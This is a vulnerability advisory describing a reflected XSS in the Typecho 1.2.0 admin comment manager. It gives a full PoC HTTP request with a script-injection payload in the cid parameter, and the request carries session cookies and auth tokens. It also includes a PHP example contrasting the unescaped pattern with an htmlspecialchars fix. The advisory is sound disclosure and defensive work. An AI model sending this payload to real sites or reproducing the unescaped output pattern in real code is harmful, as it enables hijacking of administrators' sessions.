
Typecho V1.2.0 Backend Reflected XSS

Description

The Typecho admin backend Comment Manager (/admin/manage-comments.php) contains a reflected XSS: the POST parameter cid is echoed into the page without filtering.

Affected Version

Typecho <= 1.2.0

POC

  1. Log in to the Typecho admin backend management system.
  2. In the Comment Manager, /admin/manage-comments.php, the unfiltered $request->cid is echoed directly into the HTML.

The full POC request:

POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid[]=1&cid="><script>alert(1)</script><!--
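The following is an added example, not Typecho's own code, that reconstructs the pattern the advisory describes: the cid value from the PoC body is written into an HTML attribute raw, next to the same rendering with context-appropriate escaping. The hidden-input markup and the function names are assumptions for illustration; the page does not show the actual template line in manage-comments.php.

```php
<?php
// Added example (not Typecho's code). The sample input below is the
// payload taken from the PoC request above.
$cid = '"><script>alert(1)</script><!--';

// Vulnerable pattern, as the advisory describes: the request parameter is
// concatenated straight into an attribute value. The leading " closes the
// attribute, > closes the tag, and the injected <script> runs; the trailing
// <!-- comments out the rest of the original markup so the page stays valid.
function renderVulnerable(string $cid): string
{
    // Hidden-input context is assumed; the real template line is not on the page.
    return '<input type="hidden" name="cid" value="' . $cid . '" />';
}

// Hardened pattern: escape for the attribute context. ENT_QUOTES encodes both
// " and ', so the value cannot terminate a single- or double-quoted attribute;
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning an empty
// string; an explicit charset avoids encoding-based bypasses.
function renderEscaped(string $cid): string
{
    $safe = htmlspecialchars($cid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="cid" value="' . $safe . '" />';
}

// Minimal regression check for a test suite: the rendered markup must not
// contain a raw <script tag after escaping.
function containsRawScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

echo renderVulnerable($cid), PHP_EOL;
echo renderEscaped($cid), PHP_EOL;
var_dump(containsRawScript(renderVulnerable($cid)));
var_dump(containsRawScript(renderEscaped($cid)));
```

Run with `php example.php`; the first line shows the attribute being broken out of, the second keeps the entire payload inside the quoted value as `&quot;&gt;&lt;script&gt;...`. Escaping at the point of output, rather than stripping characters on input, is the fix that holds regardless of how the value reaches the template.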

Reference

Reported by Srpopty; the vulnerability was discovered using Corax.